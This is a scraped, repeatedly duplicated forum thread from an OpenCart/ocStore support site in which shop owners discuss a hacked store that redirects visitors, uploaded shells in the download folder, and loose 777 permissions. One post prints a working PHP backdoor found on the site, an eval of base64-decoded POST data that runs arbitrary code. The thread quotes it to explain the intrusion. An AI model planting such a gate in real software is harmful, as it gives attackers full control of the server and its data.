контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 шаблон купленый? ;) нет, шаблон дефолтный поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины. код ведь не их воздуха возник сам по себе. его туда внедрили. когда перекроете дыру, только тогда можете говорить о решении проблемы. У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД). да, согласен. а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? или наводку кинете. а то в интернете как то не особо много информации про поиск и лечение вирусов на опенкарте Посмотрите в папку downloads, там тоже будет много вкусного! спасибо, глянем Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Посмотрите в папку downloads, там тоже будет много вкусного! в папке download лежат 4 файла http://prntscr.com/2uhwdp : 1) пустой index.php 2) и 3) для маркета 4) непонятно что это и откуда взялось, дата 17.02 относительно недавняя (с какого момента появился этот вирус не знаю, обнаружил только вчера случайно зайдя с телефона). содержание файла примерно следующее: http://prntscr.com/2uhxcr можно ли считать 4й вариант причиной этой проблемы? Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Так в том то и дело, что вроде бы уже давненько никаких модулей не ставил. Доступ к фтп был у стороннего человека, но не думаю, что он как то причастен к этому, хотя все возможно. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Я бы не советовал вам удалять сейчас все подозрительные файлы, найденные вами. В них может оказаться много полезной информации для опытного человека. это как симптомы болезни для врача. даже установленные права на эти файлы - это уже показатель. у меня сейчас есть некоторое свободное время. если доверяете, то могу посмотреть на вашу проблему изнутри. для этого нужны коды доступа (в личку, конечно). Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 <?php if(isset($_POST['execgate'])) { set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}} } ?> вот это довольно давно уже было на сайте. ворота нараспашку. т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается. но до поры до времени никто не заходил через эти ворота. Надіслати Поділитися на інших сайтах More sharing options... Denys Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? Потому что очень уж спокойно вам залили shell в папку download Какие модули стоят и какие vqmod допилы? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Посмотрите в папку downloads, там тоже будет много вкусного! в папке download лежат 4 файла http://prntscr.com/2uhwdp : 1) пустой index.php 2) и 3) для маркета 4) непонятно что это и откуда взялось, дата 17.02 относительно недавняя (с какого момента появился этот вирус не знаю, обнаружил только вчера случайно зайдя с телефона). содержание файла примерно следующее: http://prntscr.com/2uhxcr можно ли считать 4й вариант причиной этой проблемы? Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Так в том то и дело, что вроде бы уже давненько никаких модулей не ставил. Доступ к фтп был у стороннего человека, но не думаю, что он как то причастен к этому, хотя все возможно. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Я бы не советовал вам удалять сейчас все подозрительные файлы, найденные вами. В них может оказаться много полезной информации для опытного человека. это как симптомы болезни для врача. даже установленные права на эти файлы - это уже показатель. у меня сейчас есть некоторое свободное время. если доверяете, то могу посмотреть на вашу проблему изнутри. для этого нужны коды доступа (в личку, конечно). Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 <?php if(isset($_POST['execgate'])) { set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}} } ?> вот это довольно давно уже было на сайте. ворота нараспашку. т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается. но до поры до времени никто не заходил через эти ворота. Надіслати Поділитися на інших сайтах More sharing options... Denys Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? Потому что очень уж спокойно вам залили shell в папку download Какие модули стоят и какие vqmod допилы? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
Tom Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Так в том то и дело, что вроде бы уже давненько никаких модулей не ставил. Доступ к фтп был у стороннего человека, но не думаю, что он как то причастен к этому, хотя все возможно. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Я бы не советовал вам удалять сейчас все подозрительные файлы, найденные вами. В них может оказаться много полезной информации для опытного человека. это как симптомы болезни для врача. даже установленные права на эти файлы - это уже показатель. у меня сейчас есть некоторое свободное время. если доверяете, то могу посмотреть на вашу проблему изнутри. для этого нужны коды доступа (в личку, конечно). Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 <?php if(isset($_POST['execgate'])) { set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}} } ?> вот это довольно давно уже было на сайте. ворота нараспашку. т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается. но до поры до времени никто не заходил через эти ворота. Надіслати Поділитися на інших сайтах More sharing options... Denys Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? Потому что очень уж спокойно вам залили shell в папку download Какие модули стоят и какие vqmod допилы? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют 